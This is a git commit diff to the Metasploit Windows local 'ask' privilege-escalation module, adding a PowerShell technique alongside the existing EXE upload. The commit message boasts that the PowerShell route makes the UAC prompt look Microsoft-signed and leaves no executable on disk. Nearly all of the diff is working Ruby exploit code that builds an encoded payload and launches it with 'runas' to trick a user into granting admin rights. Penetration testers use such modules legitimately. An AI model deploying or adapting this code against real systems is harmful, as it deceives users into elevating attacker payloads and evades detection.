Added PSH option to windows/local/ask exploit
Gives you the ability to use powershell to 'ask' for admin rights if the user has them. Using powershell makes the pop up blue instead of orange and states that the company is Microsoft, it also doesn't drop an exe on the system. Looks like 32 bit https works but if you migrate out you loose priv and if you run cachedump the session hangs.bug/bundler_fix
parent
8059c59f15
commit
a5dc75a82e
|
@ -7,12 +7,14 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/exe'
|
||||
require 'msf/core/exploit/powershell'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::EXE
|
||||
include Post::File
|
||||
include Exploit::Powershell
|
||||
|
||||
def initialize(info={})
|
||||
super( update_info( info,
|
||||
|
@ -23,7 +25,10 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
UAC settings.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => [ 'mubix' ],
|
||||
'Author' => [
|
||||
'mubix', # Original technique
|
||||
'b00stfr3ak' # Added powershell option
|
||||
],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'Targets' => [ [ 'Windows', {} ] ],
|
||||
|
@ -31,13 +36,14 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'References' => [
|
||||
[ 'URL', 'http://www.room362.com/blog/2012/1/3/uac-user-assisted-compromise.html' ]
|
||||
],
|
||||
'DisclosureDate'=> "Jan 3 2012"
|
||||
'DisclosureDate'=> "Jan 3 2012",
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptString.new("FILENAME", [ false, "File name on disk"]),
|
||||
OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
|
||||
OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ])
|
||||
OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
|
||||
OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
|
||||
])
|
||||
|
||||
end
|
||||
|
@ -71,31 +77,42 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
#
|
||||
# Generate payload and random names for upload
|
||||
#
|
||||
payload = generate_payload_exe
|
||||
|
||||
if datastore["FILENAME"]
|
||||
payload_filename = datastore["FILENAME"]
|
||||
if datastore["TECHNIQUE"] == "EXE"
|
||||
if datastore["UPLOAD"]
|
||||
exe_payload = generate_exe_payload_exe
|
||||
|
||||
if datastore["FILENAME"]
|
||||
payload_filename = datastore["FILENAME"]
|
||||
else
|
||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
end
|
||||
|
||||
if datastore["PATH"]
|
||||
payload_path = datastore["PATH"]
|
||||
else
|
||||
payload_path = session.fs.file.expand_path("%TEMP%")
|
||||
end
|
||||
|
||||
cmd_location = "#{payload_path}\\#{payload_filename}"
|
||||
|
||||
if datastore["UPLOAD"]
|
||||
print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
|
||||
fd = session.fs.file.new(cmd_location, "wb")
|
||||
fd.write(exe_payload)
|
||||
fd.close
|
||||
end
|
||||
|
||||
session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
|
||||
else
|
||||
print_error("No Upload Path!")
|
||||
return
|
||||
end
|
||||
else
|
||||
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||
command = cmd_psh_payload(payload.encoded)
|
||||
arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
|
||||
session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
|
||||
end
|
||||
|
||||
if datastore["PATH"]
|
||||
payload_path = datastore["PATH"]
|
||||
else
|
||||
payload_path = session.fs.file.expand_path("%TEMP%")
|
||||
end
|
||||
|
||||
cmd_location = "#{payload_path}\\#{payload_filename}"
|
||||
|
||||
if datastore["UPLOAD"]
|
||||
print_status("Uploading #{payload_filename} - #{payload.length} bytes to the filesystem...")
|
||||
fd = session.fs.file.new(cmd_location, "wb")
|
||||
fd.write(payload)
|
||||
fd.close
|
||||
end
|
||||
|
||||
session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
|
||||
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue